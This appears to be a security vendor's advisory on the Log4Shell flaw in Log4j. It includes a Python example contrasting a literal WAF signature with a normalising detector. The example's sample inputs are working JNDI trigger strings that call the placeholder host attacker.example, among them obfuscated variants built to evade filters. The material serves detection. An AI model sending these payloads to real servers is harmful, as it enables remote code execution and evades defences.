A zero-day exploit of Apache Log4j 2 (“Log4Shell”, CVE-2021-44228) was disclosed on 9 December 2021. CISA, NCSC, ACSC, and CERT NZ have observed active exploitation of this vulnerability.
The high severity vulnerability in Log4j (a logging library present in many Java-based applications) allows for Remote Code Execution (RCE) on a server.
Log4j is present in many frameworks, making the impact widespread – Minecraft: Java Edition, Apple, Amazon, Steam, Twitter, and more are reportedly affected. The number of interdependencies around Log4j makes this vulnerability extremely serious.
The vulnerability is triggered through log messages and log message parameters: vulnerable versions of Log4j 2 perform lookup substitution on logged strings, so a value such as ${jndi:ldap://attacker-host/a} placed in any field the application logs (a User-Agent header, a username, a chat message) makes the server contact an attacker-controlled JNDI server and load the code it points to. A successful exploit therefore gives a malicious actor complete, unauthenticated control of the target system.
As soon as this issue was made public, RedShield engineers worked to develop and test web application shields to mitigate this high severity vulnerability. Shields were produced and tested by 08:22, Friday 10 December (EST).
We subsequently took steps to protect all customers from exploits targeting this vulnerability, and began deploying the new shields across all customer applications. This was completed for all customers by 22:18, Friday 10 December (EST).
Many organizations will rely on WAF signatures to block exploits targeting this vulnerability. However, since the vulnerability was disclosed we have seen other WAF vendors' signatures being bypassed: the Log4j lookup syntax lets the trigger string be obfuscated (nested lookups, case changes, URL encoding), so a rule that matches the literal text of the published proof of concept misses variants that still exploit the server.
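To make the bypass problem concrete, the following is an added example, not RedShield's code and not the shields described on this page. It contrasts a literal "${jndi:" signature with a detector that first URL-decodes the value and then collapses nested Log4j lookups (the lower:, upper: and ${prefix:key:-default} forms, which Log4j resolves before dispatching the outer lookup) until nothing changes. The User-Agent values are constructed for this example, attacker.example is a placeholder host, and the resolver is a detection heuristic that handles only those lookup forms, not a reimplementation of Log4j.

```python
"""Why a literal WAF signature for "${jndi:" is easy to evade.

Added example, not RedShield code. Sample requests are constructed.
Lookup forms collapsed: ${lower:x}, ${upper:x}, and any ${prefix:key:-default}
including the degenerate ${::-x} and ${:-x}; other lookups are left in place,
as Log4j leaves lookups it cannot resolve.
"""
import re
from urllib.parse import unquote

# Naive signature: the literal text an early WAF rule would look for.
NAIVE_SIGNATURE = re.compile(r"\$\{jndi:")

# An innermost lookup: "${...}" whose body contains no further "$", "{" or "}".
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# Signature applied after normalisation. Log4j lower-cases the lookup prefix
# before dispatch, so "${JNDI:" behaves like "${jndi:"; match case-insensitively.
NORMALIZED_SIGNATURE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Evaluate one innermost lookup roughly as Log4j's StrSubstitutor would."""
    body = match.group(0)   # the full "${...}" text
    inner = match.group(1)  # the text between the braces
    prefix, sep, rest = inner.partition(":")
    if sep and prefix.lower() == "jndi":
        return body         # the thing we are looking for: keep it intact
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    if ":-" in inner:
        # ${prefix:key:-default}: treat the lookup as failing and take the default.
        return inner.split(":-", 1)[1]
    return body             # unknown lookup with no default: left as literal text


def normalize(value: str) -> str:
    """URL-decode, then collapse nested lookups until a fixed point is reached.

    Every resolved lookup is replaced by text containing no "${", so the number
    of lookups strictly decreases on each changing pass and the loop terminates.
    """
    text = unquote(value)
    while True:
        resolved = INNERMOST_LOOKUP.sub(_resolve, text)
        if resolved == text:
            return text
        text = resolved


def naive_hit(value: str) -> bool:
    """What a literal, case-sensitive signature sees on the raw value."""
    return NAIVE_SIGNATURE.search(value) is not None


def normalized_hit(value: str) -> bool:
    """Signature applied after decoding and lookup collapsing."""
    return NORMALIZED_SIGNATURE.search(normalize(value)) is not None


# Constructed User-Agent values; attacker.example is a placeholder host.
SAMPLE_USER_AGENTS = [
    "Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0",                        # 0 benign
    "${jndi:ldap://attacker.example:1389/a}",                               # 1 textbook payload
    "${${lower:j}ndi:ldap://attacker.example:1389/a}",                      # 2 lower: lookup
    "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example:1389/a}",       # 3 default-value lookups
    "${${env:NOPE:-j}ndi:${lower:l}dap://attacker.example:1389/a}",         # 4 env default + nested
    "${${upper:j}ndi:rmi://attacker.example:1099/a}",                       # 5 case change
    "%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%3A1389%2Fa%7D",             # 6 URL-encoded
    "${date:yyyy} ${java:version}",                                         # 7 lookups, but harmless
]


def evaluate(values):
    """Return (naive_hits, normalized_hits) as lists of indexes into `values`."""
    naive = [i for i, v in enumerate(values) if naive_hit(v)]
    normalized = [i for i, v in enumerate(values) if normalized_hit(v)]
    return naive, normalized


if __name__ == "__main__":
    for i, ua in enumerate(SAMPLE_USER_AGENTS):
        print(f"{i}: naive={naive_hit(ua)!s:5} normalized={normalized_hit(ua)!s:5} "
              f"-> {normalize(ua)}")
```

On the constructed set the literal signature flags only entry 1, while the normalising detector flags entries 1 to 6 and still ignores the harmless lookups in entry 7. The point is not that this particular resolver is complete (Log4j has more lookup types, and attackers mix them freely) but that any defence keyed to the surface form of the payload has to canonicalise the input the way the vulnerable parser does before matching, and that every lookup type it does not model is a potential bypass.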
RedShield’s defensive strategy is a three-pronged approach:
If you have other applications using Java, we can build and apply Log4j shields for new customers within 24 hours. New customers can opt to have only these Log4j shields, and emergency deployment slots will be filled on a “first come, first served” basis.
Contact support@redshield.co to discuss emergency deployment. Solutions Architects will be available for consultation around your specific environment.